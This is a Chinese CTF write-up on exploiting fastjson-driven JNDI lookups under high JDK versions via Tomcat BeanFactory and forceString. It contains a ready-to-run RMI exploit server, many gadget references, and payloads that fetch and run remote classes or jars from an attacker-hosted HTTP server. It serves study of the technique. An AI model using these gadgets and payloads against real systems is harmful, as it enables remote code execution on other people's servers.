从羊城杯一道题学习高版本JDK下JNDI的利用

上周的羊城杯出了一道可以执行lookup函数的fastjson的题目,但是由于JDK版本限制如果想要远程加载对象完成RCE需要自定义一个RMI服务,在这里就学习一下这个高版本JDK是怎么绕过远程加载限制的吧

0x01 还原题目

image-20220906194219933

源码内容不多,只有一个解析控制器,

  1. @RequestMapping({"/ApiTest"})
  2. public class JsonApiTestController {
  3. @Autowired
  4. private ApiTestService apiTestService;
  5. public JsonApiTestController() {
  6. }
  7. @GetMapping({"/get"})
  8. public String getApiTest() {
  9. return this.apiTestService.getMsg().toString();
  10. }
  11. @PostMapping({"/post"})
  12. public String postApiTest(HttpServletRequest request) {
  13. ServletInputStream inputStream = null;
  14. String jsonStr = null;
  15. try {
  16. inputStream = request.getInputStream();
  17. StringBuffer stringBuffer = new StringBuffer();
  18. byte[] buf = new byte[1024];
  19. boolean var6 = false;
  20. int len;
  21. while((len = inputStream.read(buf)) != -1) {
  22. stringBuffer.append(new String(buf, 0, len));
  23. }
  24. inputStream.close();
  25. jsonStr = stringBuffer.toString();
  26. return ((Message)JSON.parseObject(jsonStr, Message.class)).toString();
  27. } catch (IOException var7) {
  28. var7.printStackTrace();
  29. return "Test fail";
  30. }
  31. }
  32. }

主要关注到/ApiTest/post控制器,接收了传入的数据参数,并且使用JSON.parseObject函数解析数据,从而触发fastjson反序列化,

但是在这里fastjson的版本为1.2.83,目前是没有公布什么新的解析漏洞的,因此把目光转向题目自定义的类,给出了一个Test类,主要大致代码如下:

  1. public class Test {
  2. public Test() {
  3. }
  4. public static void main(String[] args) throws IOException, InterruptedException {
  5. String jsonStr = "{\"content\" : {\"@type\": \"ycb.simple_json.service.JNDIService\", \"target\":\"ldap://vps:port/xxx\"}, \"msg\":{\"$ref\":\"$.content.context\"}}";
  6. System.out.println(jsonStr);
  7. Object obj = ((Message)JSON.parseObject(jsonStr, Message.class)).toString();
  8. System.out.println(obj);
  9. }
  10. }

运行输出结果为:

  1. {"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"ldap://vps:port/xxx"}, "msg":{"$ref":"$.content.context"}}
  2. Message{msg='null'}

从这里的提示转而关注到ycb.simple_json.service.JNDIService,该类的代码如下

  1. @JSONType
  2. public class JNDIService {
  3. private String target;
  4. private Context context;
  5. public JNDIService() {
  6. }
  7. public void setTarget(String target) {
  8. this.target = target;
  9. }
  10. public Context getContext() throws NamingException {
  11. if (this.context == null) {
  12. this.context = new InitialContext();
  13. }
  14. this.context.lookup(this.target);
  15. return this.context;
  16. }
  17. }

可以看到两个函数:setTargetgetContext函数,json在解析request数据的时候会先通过set方法设置target,"msg":{"$ref":"$.content.context"}会触发调用getContext函数,从而使用InitialContext.lookup加载远程对象

但是如果直接

0x02 关于JNDI在低版本JDK的利用

Java对象在JNDI中的存储方式:

  • Java序列化
  • JNDI Reference
  • Marshalled对象
  • Remote Location (已弃用)

低版本没有限制任意加载object factory的时候漏洞出发流程大致如下

image-20220907013338336

很多时候RMI的使用 - 利用方式一

在很多时候,RMI服务的远程调用是通过rmi协议指定`host:port/xxxRMIRegister注册中心指定获得一个Stub,在这个Stub对象中,有Server远程对象的通信地址和端口然后客户端的Stub通过地址和端口连接到Server端监听的通信端口并提交参数,然后Stub返回执行结果给Client端, 所以在Client客户端看来就是Stub对象在本地执行了对象的方法

这种方式在低版本的JDK中也是存在漏洞的, RMI注册中心可以在一个绑定的对象中通过 java.rmi.server.codebase 属性设置一个Codebase,当RMI客户端远程加载这个远程对象时,RMI客户端根据返回的信息执行lookup操作, 在这个过程中,会先尝试在本地CLASSPATH中去获取对应的Stub类的定义,并从本地加载,但如果在本地无法找到,RMI客户端则会向远程Codebase去获取攻击者指定的恶意对象,这种方式将会受到 useCodebaseOnly 的限制。

JDK 6u45、7u21开始,java.rmi.server.useCodebaseOnly 的默认值就是true。当该值为true时,将禁用自动加载远程类文件,仅从CLASSPATH和当前VM的java.rmi.server.codebase 指定路径加载类文件。

关键词:

  1. Codebase + java.rmi.server.codebase
  2. CLASSPATH + Stub类的定义
  3. java.rmi.server.useCodebaseOnly
  4. JDK 6u45、7u21

JNDI中RMI返回References - 利用方式二

但是除了以上方式之外, 在JNDI服务中RMI服务端还可以通过References类来绑定一个外部的远程对象(当前名称目录系统之外的对象)。在这种模式下,RMI服务端先通过Referenceable.getReference()获取绑定对象的引用并且保存在目录中,当用户全球的xxx刚好对应时就会返回一个References类替代原本的Stub.

  1. 服务端通过Referenceable.getReference()获取绑定对象的引用并且保存在目录中
  2. 客户端请求xxx绑定有对象引用, 则服务端返回对应的References

而之后客户端收到RMI服务端返回的References进如下处理:

  1. 取出返回的References中指定的Factory
  2. 执行lookup操作时,通过factory.getObjectInstance()获取外部远程对象实例
  3. 向References中指定的Factory发出请求拿到.class文件
  4. 动态加载返回的.class文件并完成实例化
  5. 执行.class实例化对象的getObjectInstance()

低版本JDK下JNDI注入的过程便如上所述了,但是在高版本却不在能使用这种方法

JDK 6u132, JDK 7u122, JDK 8u113 中Java提升了JNDI 限制了Naming/Directory服务中JNDI Reference远程加载Object Factory类的特性。系统属性 com.sun.jndi.rmi.object.trustURLCodebasecom.sun.jndi.cosnaming.object.trustURLCodebase 的默认值变为false,即默认不允许从远程的Codebase加载Reference的工厂类(Factory Class)。

关键字:

  1. References
  2. Codebase
  3. .class文件动态加载 + object factory
  4. getObjectInstance
  5. JDK 6u132, JDK 7u122, JDK 8u113
  6. com.sun.jndi.rmi.object.trustURLCodebase
  7. com.sun.jndi.cosnaming.object.trustURLCodebase

JNDI对接LDAP服务 - 利用方式三

原理和上面的JNDI对接RMI服务差不多, 主要是LDAP服务也支持返回一个JNDI Reference对象, 最后在LDAP服务端返回一个构造好的恶意JNDI Reference对象从而远程加载恶意的object factory

重点: LDAP服务的Reference远程加载Factory类不受 com.sun.jndi.rmi.object.trustURLCodebasecom.sun.jndi.cosnaming.object.trustURLCodebase等属性的限制, 这是因为它对类进行动态加载的过程并不是通过RMI Class loading完成而是URLClassLoader

2018年10月开始做出限制,JDK 11.0.1、8u191、7u201、6u211之后com.sun.jndi.ldap.object.trustURLCodebase 属性的默认值被调整为false

关键词:

  1. JNDI Reference对象
  2. com.sun.jndi.rmi.object.trustURLCodebase+com.sun.jndi.cosnaming.object.trustURLCodebase不受限
  3. JDK 11.0.1、8u191、7u201、6u211
  4. com.sun.jndi.cosnaming.object.trustURLCodebase
  5. com.sun.jndi.ldap.object.trustURLCodebase
  6. Codebase的值是通过ref.getFactoryClassLocation()获得

LDAP可以为存储的Java对象指定多种属性:

  • javaCodeBase
  • objectClass
  • javaFactory
  • javaSerializedData

0x03 高版本下的活动范围

可以看到,高版本jdk通过一些trustURLCodebase变量限制了JNDI服务通过Codebase到指定地址去请求.class远程加载object facory攻击方式

  1. 我们仍可以指定使用哪一个本地的object factory,这个object factory必须是CLASSPATH中的类,除此外还需满足两个条件:
  1. 1. 实现 javax.naming.spi.ObjectFactory 接口
  2. 2. 存在 getObjectInstance 方法
  1. 除此之外,不管是高低版本JNDI服务都是可以返回一个序列化对象然后在客户端中进行反序列化的,所以如果有反序列化的gadget也是可以完成漏洞利用的

    如果需要反序列的话可以通过LDAP的 javaSerializedData反序列化gadget

0x04 可用类的筛选

上面提到的两种方法反序列化就不必多说了,主要是找一个指定可用的object factory类,Tomcat依赖包中的org.apache.naming.factory.BeanFactory正好满足了所需的两个要求, 如果使用这个类作为指定的object factory可进行以下操作:

  1. getObjectInstance() 中会通过反射的方式实例化Reference所指向的任意Bean Class
  2. 会调用setter方法为实例化对象的所有的属性赋值
  3. Bean Class的类名、属性、属性值,全都来自于Reference对象

需要注意: beanFactory要求传入的Reference为ResourceRef类(这就是为什么很多JNDI攻击的绑定对象中都会出现ResourceRef对象的原因)

目前可以实例化一个BeanClass并且会调用它的setter方法进行对象赋值, 那么对这个BeanClass有没有什么要求呢?答案是有的:

  1. 有无参构造方法
  2. setter方法必须为public且参数为一个String类型

到这里其实限制还是比较大的,就是只能做到任意调用public且只有一个String单参数的setter方法

然而有一个参数使得这个利用范围迅速地扩大了: forceString

forceString最终在getObjectInstance函数被使用,调用栈为:

  1. getObjectInstance:148, BeanFactory (org.apache.naming.factory)
  2. getObjectInstance:332, NamingManager (javax.naming.spi)
  3. decodeObject:499, RegistryContext (com.sun.jndi.rmi.registry)
  4. lookup:138, RegistryContext (com.sun.jndi.rmi.registry)
  5. lookup:218, GenericURLContext (com.sun.jndi.toolkit.url)
  6. lookup:417, InitialContext (javax.naming)
  7. main:10, LookTest

image-20220907134022423

image-20220907134057468

原因:

beanFactory会取出ResourceRef对象中的forceString参数进行如下示例的处理:

假设参数值为x1=a,x2=b,x3=c

  1. 通过,分割得到三组字符串x1=a,x2=b,x3=c
  2. 通过=对每组字符串进行分割进行处理,例如取出x1=a切割后分别是x1a
  3. 将第一个作为要设置的参数变量名,第二个作为函数名, 表示强制转换, 当要设置指定实例化后BeanClass对象的 x1属性时由原本的setX1方法强制转换为调用a方法进行参数设置
  4. BeanClass对象需要设置哪些参数完全由我们的ResourceRef对象决定,我们完全可控所以就是如果原本需要设置BeanClass对象的变量x1="xx11"就会调用它的setX1(“xx11”)去将x1设为xx11,但是因为以上forceString的存在会变为调用a("xx11")
  5. 后面对x2,x3的处理同于x1

所以就是,到这里我们就可以完成任意public的String单参数函数的调用了

属于BeanClass,且通过一个String参数就能执行危险操作的Class方法以下两个用的比较多:

  1. javax.el.ELProcessor#eval 任意代码执行

    (注意,Tomcat7中不存在该类)

    参数示例:

    1. "".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','whoami']).start()")
    1. ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "",
    2. true, "org.apache.naming.factory.BeanFactory", null);
    3. ref.add(new StringRefAddr("forceString", "x=eval"));
    4. ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/bash','-c','/Applications/Calculator.app/Contents/MacOS/Calculator']).start()\")"));
    5. return ref;
  2. groovy.lang.GroovyShell#evaluate 执行 Groovy 脚本

    参数示例:

    1. println 'Hello World.'

0x05 回到题目 + 其他类的利用拓展

在这里搜索了一下发现ELProcessor类并没有被加载进来,所以第一个自然也就不可用了,GroovyShell的搜索结果也是不存在

image-20220907033003817

但是除了这两个类之外其实还存在很多个类都是可以进行漏洞利用的,这里简单列出浅蓝师傅在探索高版本 JDK 下 JNDI 漏洞的利用方法里面提出其他利用类:

  1. javax.management.loading.MLet#addClasspath+loadClass

    1. private static ResourceRef tomcatMLet() {
    2. ResourceRef ref = new ResourceRef("javax.management.loading.MLet", null, "", "",
    3. true, "org.apache.naming.factory.BeanFactory", null);
    4. ref.add(new StringRefAddr("forceString", "a=loadClass,b=addURL,c=loadClass"));
    5. ref.add(new StringRefAddr("a", "javax.el.ELProcessor"));
    6. ref.add(new StringRefAddr("b", "http://127.0.0.1:2333/"));
    7. ref.add(new StringRefAddr("c", "Blue"));
    8. return ref;
    9. }
  2. groovy.lang.GroovyClassLoader#addClasspath+loadClass

    1. private static ResourceRef tomcatGroovyClassLoader() {
    2. ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "",
    3. true, "org.apache.naming.factory.BeanFactory", null);
    4. ref.add(new StringRefAddr("forceString", "a=addClasspath,b=loadClass"));
    5. ref.add(new StringRefAddr("a", "http://127.0.0.1:8888/"));
    6. ref.add(new StringRefAddr("b", "blue"));
    7. return ref;
    8. }

    http://127.0.0.1:8888/下面写入一个**blue.groovy**文件

    1. @groovy.transform.ASTTest(value={assert Runtime.getRuntime().exec("calc")})
    2. class Person{}
  3. org.yaml.snakeyaml.Yaml#load

    1. private static ResourceRef tomcat_snakeyaml(){
    2. ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
    3. true, "org.apache.naming.factory.BeanFactory", null);
    4. String yaml = "!!javax.script.ScriptEngineManager [\n" +
    5. " !!java.net.URLClassLoader [[\n" +
    6. " !!java.net.URL [\"http://127.0.0.1:8888/exp.jar\"]\n" +
    7. " ]]\n" +
    8. "]";
    9. ref.add(new StringRefAddr("forceString", "a=load"));
    10. ref.add(new StringRefAddr("a", yaml));
    11. return ref;
    12. }
  4. new com.thoughtworks.xstream.XStream#fromXML

    new com.thoughtworks.xstream.XStream().fromXML(String)同样符合条件

    1. private static ResourceRef tomcat_xstream(){
    2. ResourceRef ref = new ResourceRef("com.thoughtworks.xstream.XStream", null, "", "",
    3. true, "org.apache.naming.factory.BeanFactory", null);
    4. String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
    5. " <unserializable-parents/>\n" +
    6. " <java.util.PriorityQueue>\n" +
    7. " <default>\n" +
    8. " <size>2</size>\n" +
    9. " </default>\n" +
    10. " <int>3</int>\n" +
    11. " <dynamic-proxy>\n" +
    12. " <interface>java.lang.Comparable</interface>\n" +
    13. " <handler class='sun.tracing.NullProvider'>\n" +
    14. " <active>true</active>\n" +
    15. " <providerType>java.lang.Comparable</providerType>\n" +
    16. " <probes>\n" +
    17. " <entry>\n" +
    18. " <method>\n" +
    19. " <class>java.lang.Comparable</class>\n" +
    20. " <name>compareTo</name>\n" +
    21. " <parameter-types>\n" +
    22. " <class>java.lang.Object</class>\n" +
    23. " </parameter-types>\n" +
    24. " </method>\n" +
    25. " <sun.tracing.dtrace.DTraceProbe>\n" +
    26. " <proxy class='java.lang.Runtime'/>\n" +
    27. " <implementing__method>\n" +
    28. " <class>java.lang.Runtime</class>\n" +
    29. " <name>exec</name>\n" +
    30. " <parameter-types>\n" +
    31. " <class>java.lang.String</class>\n" +
    32. " </parameter-types>\n" +
    33. " </implementing__method>\n" +
    34. " </sun.tracing.dtrace.DTraceProbe>\n" +
    35. " </entry>\n" +
    36. " </probes>\n" +
    37. " </handler>\n" +
    38. " </dynamic-proxy>\n" +
    39. " <string>calc</string>\n" +
    40. " </java.util.PriorityQueue>\n" +
    41. "</java.util.PriorityQueue>";
    42. ref.add(new StringRefAddr("forceString", "a=fromXML"));
    43. ref.add(new StringRefAddr("a", xml));
    44. return ref;
    45. }
  5. org.mvel2.sh.ShellSession#exec

    解析MVEL表达式

    1. private static ResourceRef tomcat_MVEL(){
    2. ResourceRef ref = new ResourceRef("org.mvel2.sh.ShellSession", null, "", "",
    3. true, "org.apache.naming.factory.BeanFactory", null);
    4. ref.add(new StringRefAddr("forceString", "a=exec"));
    5. ref.add(new StringRefAddr("a",
    6. "push Runtime.getRuntime().exec('calc');"));
    7. return ref;
    8. }
  6. com.sun.glass.utils.NativeLibLoader#loadLibrary

    需要能够通过WEB功能或者写文件gadget上传一个动态链接库(例如下面的libcmd)来加载并执行命令。

    1. private static ResourceRef tomcat_loadLibrary(){
    2. ResourceRef ref = new ResourceRef("com.sun.glass.utils.NativeLibLoader", null, "", "",
    3. true, "org.apache.naming.factory.BeanFactory", null);
    4. ref.add(new StringRefAddr("forceString", "a=loadLibrary"));
    5. ref.add(new StringRefAddr("a", "/../../../../../../../../../../../../tmp/libcmd"));
    6. return ref;
    7. }
  7. org.apache.catalina.users.MemoryUserDatabaseFactory

    这里能做的事情很多,XXE,RCE,创建Tomcat管理员,写 Webshell

  8. org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory#configureDataSource

    1. private static Reference tomcat_dbcp2_RCE(){
    2. return dbcpByFactory("org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory");
    3. }
    4. private static Reference tomcat_dbcp1_RCE(){
    5. return dbcpByFactory("org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory");
    6. }
    7. private static Reference commons_dbcp2_RCE(){
    8. return dbcpByFactory("org.apache.commons.dbcp2.BasicDataSourceFactory");
    9. }
    10. private static Reference commons_dbcp1_RCE(){
    11. return dbcpByFactory("org.apache.commons.dbcp.BasicDataSourceFactory");
    12. }
    13. private static Reference dbcpByFactory(String factory){
    14. Reference ref = new Reference("javax.sql.DataSource",factory,null);
    15. String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
    16. "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
    17. "java.lang.Runtime.getRuntime().exec('/System/Applications/Calculator.app/Contents/MacOS/Calculator')\n" +
    18. "$$\n";
    19. ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
    20. ref.add(new StringRefAddr("url",JDBC_URL));
    21. ref.add(new StringRefAddr("username","root"));
    22. ref.add(new StringRefAddr("password","password"));
    23. ref.add(new StringRefAddr("initialSize","1"));
    24. return ref;
    25. }
  9. org.apache.tomcat.jdbc.pool.DataSourceFactory

    1. private static Reference tomcat_JDBC_RCE(){
    2. return dbcpByFactory("org.apache.tomcat.jdbc.pool.DataSourceFactory");
    3. }
    4. private static Reference dbcpByFactory(String factory){
    5. Reference ref = new Reference("javax.sql.DataSource",factory,null);
    6. String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
    7. "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
    8. "java.lang.Runtime.getRuntime().exec('/System/Applications/Calculator.app/Contents/MacOS/Calculator')\n" +
    9. "$$\n";
    10. ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
    11. ref.add(new StringRefAddr("url",JDBC_URL));
    12. ref.add(new StringRefAddr("username","root"));
    13. ref.add(new StringRefAddr("password","password"));
    14. ref.add(new StringRefAddr("initialSize","1"));
    15. return ref;
    16. }
  10. com.alibaba.druid

    1. private static Reference druid(){
    2. Reference ref = new Reference("javax.sql.DataSource","com.alibaba.druid.pool.DruidDataSourceFactory",null);
    3. String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
    4. "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
    5. "java.lang.Runtime.getRuntime().exec('/System/Applications/Calculator.app/Contents/MacOS/Calculator')\n" +
    6. "$$\n";
    7. String JDBC_USER = "root";
    8. String JDBC_PASSWORD = "password";
    9. ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
    10. ref.add(new StringRefAddr("url",JDBC_URL));
    11. ref.add(new StringRefAddr("username",JDBC_USER));
    12. ref.add(new StringRefAddr("password",JDBC_PASSWORD));
    13. ref.add(new StringRefAddr("initialSize","1"));
    14. ref.add(new StringRefAddr("init","true"));
    15. return ref;
    16. }
  11. Deserialize

    dbcp

    1. ResourceRef ref = new ResourceRef("org.apache.commons.dbcp2.datasources.SharedPoolDataSource", null, "", "",
    2. true, "org.apache.commons.dbcp2.datasources.SharedPoolDataSourceFactory", null);
    3. ref.add(new BinaryRefAddr("jndiEnvironment", Files.readAllBytes(Paths.get("calc.bin"))));

    mchange-common

    1. ResourceRef ref = new ResourceRef("java.lang.String", null, "", "", true, "com.mchange.v2.naming.JavaBeanObjectFactory", null);
    2. ref.add(new BinaryRefAddr("com.mchange.v2.naming.JavaBeanReferenceMaker.REF_PROPS_KEY", Files.readAllBytes(Paths.get("calc.bin"))));

    hessian

    1. LookupRef ref = new LookupRef("java.lang.String","look");
    2. ref.add(new StringRefAddr("factory", "com.caucho.hessian.client.HessianProxyFactory"));
    3. //com.caucho.burlap.client.BurlapProxyFactory
    4. ref.add(new StringRefAddr("type", "java.lang.AutoCloseable"));
    5. ref.add(new StringRefAddr("url", "http://127.0.0.1:6666/"));

0x06 找到可用类

在上面众多的可用类中逐一进行类检索,最后可以找到org.yaml.snakeyaml.Yaml#load(java.lang.String)已载入项目中, 使用这个Yaml的load方法完成RCE(使用该方法需要使用项目额外生成一个.jar包: https://github.com/artsploit/yaml-payload)

  1. import com.sun.jndi.rmi.registry.ReferenceWrapper;
  2. import org.apache.naming.ResourceRef;
  3. import javax.naming.StringRefAddr;
  4. import java.rmi.Naming;
  5. import java.rmi.registry.LocateRegistry;
  6. public class RMIServer {
  7. private static ResourceRef eLProcessor(){
  8. ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "",
  9. true, "org.apache.naming.factory.BeanFactory", null);
  10. ref.add(new StringRefAddr("forceString", "x=eval"));
  11. ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/bash','-c','/Applications/Calculator.app/Contents/MacOS/Calculator']).start()\")"));
  12. System.out.println("请检查当前项目是否存在javax.el.ELProcessor#eval");
  13. return ref;
  14. }
  15. private static ResourceRef groovyShell(){
  16. ResourceRef ref = new ResourceRef("\"groovy.bugs.Autobox.Util.printByte(\\\"1\\\", Byte.valueOf((byte)1));\"", null, "", "",
  17. true, "org.apache.naming.factory.BeanFactory", null);
  18. ref.add(new StringRefAddr("forceString", "x=evaluate"));
  19. // ref.add(new StringRefAddr("x", "Runtime.getRuntime().exec(\"calc\");"));
  20. ref.add(new StringRefAddr("x", "groovy.bugs.Autobox.Util.printByte(\"1\", Byte.valueOf((byte)1));"));
  21. System.out.println("请检查当前项目是否存在groovy.lang.GroovyShell#evaluate");
  22. return ref;
  23. }
  24. private static ResourceRef tomcatMLet() {
  25. ResourceRef ref = new ResourceRef("javax.management.loading.MLet", null, "", "",
  26. true, "org.apache.naming.factory.BeanFactory", null);
  27. ref.add(new StringRefAddr("forceString", "a=loadClass,b=addURL,c=loadClass"));
  28. ref.add(new StringRefAddr("a", "javax.el.ELProcessor"));
  29. ref.add(new StringRefAddr("b", "http://127.0.0.1:2333/"));
  30. ref.add(new StringRefAddr("c", "Exploit"));
  31. System.out.println("请检查当前项目是否存在javax.management.loading.MLet");
  32. return ref;
  33. }
  34. private static ResourceRef tomcatGroovyClassLoader() {
  35. ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "",
  36. true, "org.apache.naming.factory.BeanFactory", null);
  37. ref.add(new StringRefAddr("forceString", "a=addClasspath,b=loadClass"));
  38. ref.add(new StringRefAddr("a", "http://127.0.0.1/"));
  39. ref.add(new StringRefAddr("b", "blue"));
  40. System.out.println("请检查当前项目是否存在groovy.lang.GroovyClassLoader#loadClass");
  41. System.out.println("在vps的Server服务挂上一个blue.groovy文件,内容如下:");
  42. System.out.println("@groovy.transform.ASTTest(value={assert Runtime.getRuntime().exec(\"calc\")})class Person{}");
  43. return ref;
  44. }
  45. private static ResourceRef tomcat_snakeyaml(){
  46. ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
  47. true, "org.apache.naming.factory.BeanFactory", null);
  48. String yaml = "!!javax.script.ScriptEngineManager [\n" +
  49. " !!java.net.URLClassLoader [[\n" +
  50. " !!java.net.URL [\"http://127.0.0.1:80/yaml-payload.jar\"]\n" +
  51. " ]]\n" +
  52. "]";
  53. ref.add(new StringRefAddr("forceString", "a=load"));
  54. ref.add(new StringRefAddr("a", yaml));
  55. System.out.println("请检查当前项目是否存在org.yaml.snakeyaml.Yaml#load");
  56. System.out.println("转到https://github.com/artsploit/yaml-payload 使用项目生产yaml-payload.jar放在http服务端下");
  57. return ref;
  58. }
  59. private static ResourceRef tomcat_xstream(){
  60. ResourceRef ref = new ResourceRef("com.thoughtworks.xstream.XStream", null, "", "",
  61. true, "org.apache.naming.factory.BeanFactory", null);
  62. String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
  63. " <unserializable-parents/>\n" +
  64. " <java.util.PriorityQueue>\n" +
  65. " <default>\n" +
  66. " <size>2</size>\n" +
  67. " </default>\n" +
  68. " <int>3</int>\n" +
  69. " <dynamic-proxy>\n" +
  70. " <interface>java.lang.Comparable</interface>\n" +
  71. " <handler class='sun.tracing.NullProvider'>\n" +
  72. " <active>true</active>\n" +
  73. " <providerType>java.lang.Comparable</providerType>\n" +
  74. " <probes>\n" +
  75. " <entry>\n" +
  76. " <method>\n" +
  77. " <class>java.lang.Comparable</class>\n" +
  78. " <name>compareTo</name>\n" +
  79. " <parameter-types>\n" +
  80. " <class>java.lang.Object</class>\n" +
  81. " </parameter-types>\n" +
  82. " </method>\n" +
  83. " <sun.tracing.dtrace.DTraceProbe>\n" +
  84. " <proxy class='java.lang.Runtime'/>\n" +
  85. " <implementing__method>\n" +
  86. " <class>java.lang.Runtime</class>\n" +
  87. " <name> exec </name>\n" +
  88. " <parameter-types>\n" +
  89. " <class>java.lang.String</class>\n" +
  90. " </parameter-types>\n" +
  91. " </implementing__method>\n" +
  92. " </sun.tracing.dtrace.DTraceProbe>\n" +
  93. " </entry>\n" +
  94. " </probes>\n" +
  95. " </handler>\n" +
  96. " </dynamic-proxy>\n" +
  97. " <string>calc</string>\n" +
  98. " </java.util.PriorityQueue>\n" +
  99. "</java.util.PriorityQueue>";
  100. ref.add(new StringRefAddr("forceString", "a=fromXML"));
  101. ref.add(new StringRefAddr("a", xml));
  102. System.out.println("请检查当前项目是否存在com.thoughtworks.xstream.XStream#fromXML");
  103. return ref;
  104. }
  105. private static ResourceRef tomcat_MVEL(){
  106. ResourceRef ref = new ResourceRef("org.mvel2.sh.ShellSession", null, "", "",
  107. true, "org.apache.naming.factory.BeanFactory", null);
  108. ref.add(new StringRefAddr("forceString", "a=exec"));
  109. ref.add(new StringRefAddr("a",
  110. "push Runtime.getRuntime().exec('calc');"));
  111. System.out.println("请检查当前项目是否存在org.mvel2.sh.ShellSession#exec");
  112. return ref;
  113. }
  114. private static ResourceRef tomcat_loadLibrary(){
  115. ResourceRef ref = new ResourceRef("com.sun.glass.utils.NativeLibLoader", null, "", "",
  116. true, "org.apache.naming.factory.BeanFactory", null);
  117. ref.add(new StringRefAddr("forceString", "a=loadLibrary"));
  118. ref.add(new StringRefAddr("a", "/../../../../../../../../../../../../tmp/libcmd"));
  119. System.out.println("该漏洞需要结合一个文件上传点上传一个'动态链接库文件',然后通过loadLibrary函数对这个动态链接库文件进行加载进而触发漏洞");
  120. return ref;
  121. }
  122. public static void main(String[] args) throws Exception{
  123. LocateRegistry.createRegistry(1099);
  124. ReferenceWrapper referenceWrapper = new ReferenceWrapper(tomcat_snakeyaml());
  125. Naming.rebind("rmi://0.0.0.0:1099/Exploit",referenceWrapper);
  126. System.out.println("RMI Server Start Working...");
  127. }
  128. }

运行之后在, 本地80端口开启一个http服务,并且将 yaml-payload 项目生产的yaml-payload.jar包放到目录下(执行什么命令由项目AwesomeScriptEngineFactory.java文件中的构造函数指定 ).

之后发送payload成功执行命令

  1. {"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://127.0.0.1:1099/Exploit"}, "msg":{"$ref":"$.content.context"}}

image-20220907221624508

image-20220907211213752

image-20220907211217167

0x07 学习链接

https://mp.weixin.qq.com/s?biz=MzAxNTg0ODU4OQ==&mid=2650358440&idx=1&sn=e005f721beb8584b2c2a19911c8fef67&chksm=83f0274ab487ae5c250ae8747d7a8dc7d60f8c5bdc9ff63d0d930dca63199f13d4648ffae1d0

https://mp.weixin.qq.com/s/Dq1CPbUDLKH2IN0NA_nBDA

https://tttang.com/archive/1405/#toc_mlet

  • 发表于 2022-09-20 09:57:07
  • 阅读 ( 7934 )
  • 分类:漏洞分析

0 条评论

markin
markin

10 篇文章

站长统计